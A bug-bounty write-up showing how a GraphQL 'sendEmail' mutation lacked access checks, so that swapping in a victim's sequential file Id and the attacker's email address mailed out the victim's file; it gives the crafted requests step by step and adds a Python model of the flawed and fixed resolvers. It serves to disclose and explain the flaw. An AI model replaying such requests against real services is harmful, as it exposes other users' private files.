IDOR Vulnerability In GraphQL Api On Website
Assalamualaikum Bug Hunter & Hello everyone.
In this article I want to share my experience with an Insecure Direct Object Reference (IDOR) finding in a GraphQL API on a website.
While testing with the Sandro Proxy tool, I captured the following request body sent to the GraphQL API:
[{"operation":"sendEmail","variables":{"[Path]Id":"1002203272","[Path]Hash":"38C09************788Y","lang":"id","emails":["victim@gmail.com"]},"query":"mutation sendEmail($[Path]Id: ID, $[Path]Hash: String, $lang: String, $emails: [String]) {\n sendEmail[Path]([Path]Id: $[Path]Id, [Path]Hash: $[Path]Hash, lang: $lang, emails: $emails)\n}\n"}]
This request makes the server retrieve a file and send it to the email address(es) listed in the emails variable.
From the request above, note the following variables:
1. "[Path]Id":"1002203272"
2. "[Path]Hash":"38C09************788Y"
Here the website uses both a [Path]Id and a [Path]Hash. I don't know for sure why it was designed this way, but I assumed that even if an attacker found a [Path]Id, they would still have to find the victim's [Path]Hash, and that this implementation is therefore very safe from IDOR attacks.
3. "emails":["victim@gmail.com"]
There’s nothing suspicious about this snippet.
At first glance an IDOR looks hard to find here, because the website ties each file to both a [Path]Id and a [Path]Hash. However, in this request I found an IDOR vulnerability stemming from a missing access check in the GraphQL API: the server never verifies that the caller is entitled to the file referenced by [Path]Id.
Follow me :)
1. The GraphQL API performs no proper access check when it retrieves the file and sends it to the destination email.
Why did this happen?
Because for "operation":"sendEmail" the GraphQL API only checks that "[Path]Id" exists; it never verifies "[Path]Hash" against that Id, and it never checks that the caller owns the file.
2. Open Burp Suite or Sandro Proxy and send the request below:
[{"operation":"sendEmail","variables":{"[Path]Id":"1002203272","[Path]Hash":"38C09************788Y","lang":"id","emails":["attacker@gmail.com"]},"query":"mutation sendEmail($[Path]Id: ID, $[Path]Hash: String, $lang: String, $emails: [String]) {\n sendEmail[Path]([Path]Id: $[Path]Id, [Path]Hash: $[Path]Hash, lang: $lang, emails: $emails)\n}\n"}]
3. In that request, change two variables:
A. "[Path]Id":"1002203272"
Replace the Id with another number while leaving your own "[Path]Hash" untouched. Example:
[+] "[Path]Id":"1002203272" is the Id of my own file (Attacker).
[+] "[Path]Id":"1002203271" is the Id of the victim's file (Victim); any other nearby or random number can be tried the same way.
B. "emails":["attacker@gmail.com"]
Replace it with your own email address; the victim's file will be sent there.
4. Final request:
[{"operation":"sendEmail","variables":{"[Path]Id":"1002203271","[Path]Hash":"38C09************788Y","lang":"id","emails":["attacker@gmail.com"]},"query":"mutation sendEmail($[Path]Id: ID, $[Path]Hash: String, $lang: String, $emails: [String]) {\n sendEmail[Path]([Path]Id: $[Path]Id, [Path]Hash: $[Path]Hash, lang: $lang, emails: $emails)\n}\n"}]
5. Check your inbox: the victim's file has been sent to your email address.
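To make the root cause behind steps 1 to 5 concrete, here is an added Python example; it is not the site's code (which is not visible on this page), and every name, the sample file table, the use of an HMAC over the Id as the way [Path]Hash is derived, and the fake outbox are assumptions. It puts a toy sendEmail resolver written the way the article describes it (it only checks that [Path]Id exists) next to a hardened version that verifies the submitted hash against the Id and checks that the authenticated caller owns the file, then replays the final request from step 4 against both.

```python
import hashlib
import hmac

# Constructed sample data (assumption): which user owns which [Path]Id.
FILES = {
    "1002203272": {"owner": "attacker", "name": "attacker-report.pdf"},
    "1002203271": {"owner": "victim", "name": "victim-report.pdf"},
}

# Hypothetical server-side secret used to derive [Path]Hash from [Path]Id.
SECRET = b"server-side-secret"

# Fake outbox standing in for the mail sender: (file name, recipient) pairs.
OUTBOX = []


def path_hash(path_id: str) -> str:
    """Assumed derivation of [Path]Hash: an HMAC-SHA256 over the Id, hex, upper-case."""
    return hmac.new(SECRET, path_id.encode(), hashlib.sha256).hexdigest().upper()


def send_email_vulnerable(variables: dict, current_user: str) -> str:
    """Resolver as the article describes it: only checks that [Path]Id exists.
    [Path]Hash is received but never verified, and the file owner is never
    compared with the authenticated user, so any Id plus any hash goes through."""
    record = FILES.get(variables["[Path]Id"])
    if record is None:
        return "error: unknown id"
    for recipient in variables["emails"]:
        OUTBOX.append((record["name"], recipient))
    return "ok"


def send_email_fixed(variables: dict, current_user: str) -> str:
    """Hardened resolver: the hash must match the Id, and the caller must own the file."""
    path_id = variables["[Path]Id"]
    record = FILES.get(path_id)
    if record is None:
        return "error: unknown id"
    # Bind the hash to the Id with a constant-time comparison, so a hash issued
    # for one file cannot be reused with another file's Id.
    if not hmac.compare_digest(path_hash(path_id), variables["[Path]Hash"]):
        return "error: hash mismatch"
    # Object-level authorization: knowing a valid Id/hash pair is still not enough;
    # the authenticated user has to be the owner of the referenced file.
    if record["owner"] != current_user:
        return "error: forbidden"
    for recipient in variables["emails"]:
        OUTBOX.append((record["name"], recipient))
    return "ok"


def idor_attempt(resolver) -> tuple:
    """Replay the article's final request: the attacker keeps their own [Path]Hash,
    swaps in the victim's [Path]Id and points emails at their own inbox.
    Returns (resolver result, whether the victim's file landed in the attacker's inbox)."""
    OUTBOX.clear()
    variables = {
        "[Path]Id": "1002203271",               # victim's Id (step 3A)
        "[Path]Hash": path_hash("1002203272"),  # attacker's own hash, left unchanged
        "lang": "id",
        "emails": ["attacker@gmail.com"],       # attacker's inbox (step 3B)
    }
    result = resolver(variables, current_user="attacker")
    leaked = ("victim-report.pdf", "attacker@gmail.com") in OUTBOX
    return result, leaked


if __name__ == "__main__":
    print("vulnerable:", idor_attempt(send_email_vulnerable))
    print("fixed:     ", idor_attempt(send_email_fixed))
```

Note that the hash check alone is not the fix: if an attacker ever obtains a victim's real [Path]Id and [Path]Hash pair (for example from a forwarded link), only the ownership check in send_email_fixed still stops the file from being mailed out.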
Bounty : $$